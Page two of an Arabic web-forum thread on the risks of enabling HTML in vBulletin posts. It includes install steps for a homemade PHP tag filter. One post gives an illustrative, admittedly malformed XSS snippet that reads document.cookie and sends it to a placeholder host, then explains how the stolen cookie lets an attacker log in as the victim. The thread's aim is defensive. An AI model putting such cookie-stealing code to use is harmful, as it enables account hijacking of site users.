صفحة 2 من 3 الأولىالأولى 123 الأخيرةالأخيرة
النتائج 16 إلى 30 من 34

الموضوع: خطورة تفعيل الـ html ( للمطورين فقط )

  1. #16
    مُجَاهِد سابقاً
    تاريخ التسجيل
    Apr 2004
    المشاركات
    12,000


    موضوع جميل ..
    ومناقشة أجمل ..
    والشكر لكم ..





    __________________
    استخدم خاصية تنبيه المشرفين للضرورة وعند ملاحظة موضوع يخالف قوانين منتديات سوالف وسيتم مراجعة الموضوع او المشاركة المبلغ عنها على الفور

  2. #17
    عضو سوبر نشيط
    تاريخ التسجيل
    Aug 2004
    المشاركات
    723


    السلام عليكم
    ما النتيجة النهائية التي وصلت لها أخي العندليب هل هناك من مزيد غير هذه الأوسمة الخطرة وهل ستضع هاك معين أو أوامر في أحد الملفات لتنفيذ الفلترة على الأوسمة






  3. #18


    السلام عليكم ورحمة الله وبركاته

    أخواني ما أجمل النقاش المثمر معكم.

    الحمدلله لقد قمت بعمل داله للفلتره أرجو إختبارها منكم وإبداء أي ملاحظات لتحسين الكوود.

    الملف بالمرفق

    طريقة التركيب على منتديات الـ vb الجيل الثالث إصدار 3,0
    1- قم برفع ملف functions_custom.php الى مجلد Includes .

    2- قم بفتح ملف functions.php وأبحث عن السطر التالي:
    كود PHP:
    error_reporting(E_ALL & ~E_NOTICE); 
    2- أضف بعده السطر التالي :
    كود PHP:
    require_once('./includes/functions_custom.php'); 
    3- قم بفتح ملف functions_newpost.php وأبحث عن السطر التالي :
    كود PHP:
    $post['message'] = trim($post['message']); 
    4- إستبدله بالسطر التالي:
    كود PHP:
    $post['message'] = strip_Tag(trim($post['message'])); 

    5- قم بتفعيل الـ html في المنتدى وقم بالتجربه بإدراج موضوع مكتوب بالـ html وبالأكواد الخطيره التي ذكرناها .


    أرجوا إثراء الموضوع مثل المناقشه السابقه وبارك الله بكم.





    الملفات المرفقة الملفات المرفقة

  4. #19
    عضو جديد
    تاريخ التسجيل
    Nov 2005
    المشاركات
    18


    متميز العندليب
    إلى الأمام






  5. #20
    عضو نشيط جدا
    تاريخ التسجيل
    Apr 2004
    المشاركات
    583


    الله يعطيك العافية اخوي العندليب

    انسان محب للخير بارك الله فيك






  6. #21
    عضو نشيط
    تاريخ التسجيل
    Jun 2005
    المشاركات
    287


    جزاك الله خيرا اخي العزيز






  7. #22
    عضو سوبر نشيط
    تاريخ التسجيل
    Nov 2005
    المشاركات
    715


    جزاك الله كل خير
    مهمه فعلا
    وان شاء الله تزيد في تطويرها






  8. #23
    Banned
    تاريخ التسجيل
    Aug 2004
    المشاركات
    476


    جزالك الله خير

    الله يعطيك الف عافيه






  9. #24


    أشكركم يا أخواني على مروركم بارك الله فيكم

    نريد نتائج التجربه مشكورين






  10. #25
    عضو فعال
    تاريخ التسجيل
    Jul 2003
    المشاركات
    1,576


    ألف شكر للأخ العندليب على طرحه للموضوع


    هذه النقطة فعلا غاية في الخطورة .. لا تكمن خطورتها فقط في تغيير شكل المنتدى أو اللعب في أوامر برنامجك ..


    ولكن لنقل أنك مثلا عملت " سجل زوار " .. وكانت ال HTML مفعلة ..

    ثم قام شخص مثلا بوضع الكود :
    كود PHP:
    <script>
    Cook document.cookie;
    </script>

    <a href="http://www.any.com/get.php?cook=javascript::Cook">إضغط لمشاهدة الصورة</a> 
    (( الكود أعتقد غير صحيح من ناحية ال Syntax ولكن أنا أقصد الفكرة عامة ))

    وفي صفحة get.php يستطيع الشخص أن يقوم مثلا بإرسال محتويات المتغير ( Cook ) والذي بدوره يحتوي على معلومات الكوكيز للشخص الذي ضغط على اللنك ..

    فيقوم مثلا بإرسال محتويات الكوكيز إلى بريده .. ثم يأخذ تلك المحتويات من بريده .. ليقوم بوضعها في ملف تكست محترم .. في فولدر Cookies

    ثم يقوم بالدخول إلى المنتدى مثلا .. ليجد عبارة " مرحبا بك يا عضو " .. وعضو = عضوية الشخص اللي ضغط اللنك


    تفعيل ال HTML خطر لأبعد الحدود .. ولا يوجد للأسف مجال للفلترة الكاملة ..

    تسمى مثل هذه الثغرات ب XSS scripting bugs ..





    __________________
    SWF Thumbnail - tweet me

  11. #26


    الأخ Egyptechno أشكرك على الإضافه ولكن هل جربت الكوود الذي أرفقته أنت على الفلتر ؟
    بالتأكيد لا

    لو قمت بتمريره عبر الفلتر لأصبح مثل الشكل التالي:
    كود HTML:
    <a href="http://www.any.com/get.php?cook=javascript::Cook">إضغط لمشاهدة الصورة</a> 
    أما رمز javascript: فهذا يتم تغييره في برمجة المنتدى vb لأن تصميمي لهذا الكوود أتى في الأساس لكي يتوافق مع الـ vb أولا .

    لو قرأت أول الموضوع لعرفت أنني أتكلم عن فلترة الرموز التي ذكرناها والزملاء الى الان يبدون ملاحظاتهم
    ولا تنسى أن الكوود تحت التجربه حتى الان

    موفق






  12. #27
    عضو فعال جدا
    تاريخ التسجيل
    Feb 2003
    المشاركات
    2,007


    شيء جميل

    ولكن المشكلة

    أن الأعضاء مايعطون وجه

    تلقى الواحد يحط الجمل صور بدل نصوص

    وبعدين انتظر اسبوع لين تفتح الصفحة

    عموما هي مفيدة في بعض التخصصات






  13. #28


    اقتباس المشاركة الأصلية كتبت بواسطة fayz
    شيء جميل

    ولكن المشكلة

    أن الأعضاء مايعطون وجه

    تلقى الواحد يحط الجمل صور بدل نصوص

    وبعدين انتظر اسبوع لين تفتح الصفحة

    عموما هي مفيدة في بعض التخصصات
    بإمكانك تحديد العدد الأقصى للصور بأي موضوع من خيارات المنتدى لو كان لديك منتدى.

    ولكي يكون الكوود عام ويركب على أي سكربت اخر غير سكربت المنتديات سأضيف داله أخرى لحساب مجموع الرموز لرمز معين مثل img أو غيرها .

    شكراً لك






  14. #29
    عضو فعال
    تاريخ التسجيل
    Jul 2003
    المشاركات
    1,576


    عندليب باشا ..

    واخد بالي

    أنا فقط أحببت طرح جانب آخر من المشكلة

    على العموم لدي لك بعض الأفكار .. لو عندك ماسنجر :
    egyptechno آت هوتميل


    تحياتي





    __________________
    SWF Thumbnail - tweet me

  15. #30
    عضو فعال جدا
    تاريخ التسجيل
    Jun 2003
    المشاركات
    2,358


    أنت حقاً أفضل مثال نقدمة لكل هاكرز يدافع عن الحقوق و المواقع العربية بشكل مثالى .





    __________________
    الطاووس ..





ضوابط المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •  

أضف موقعك هنا| اخبار السيارات | حراج | شقق للايجار في الكويت | بيوت للبيع في الكويت | دليل الكويت العقاري | مقروء | شركة كشف تسربات المياه | شركة عزل اسطح بالرياض | عزل فوم بالرياض| عزل اسطح بالرياض | كشف تسربات المياة بالرياض | شركة عزل اسطح بالرياض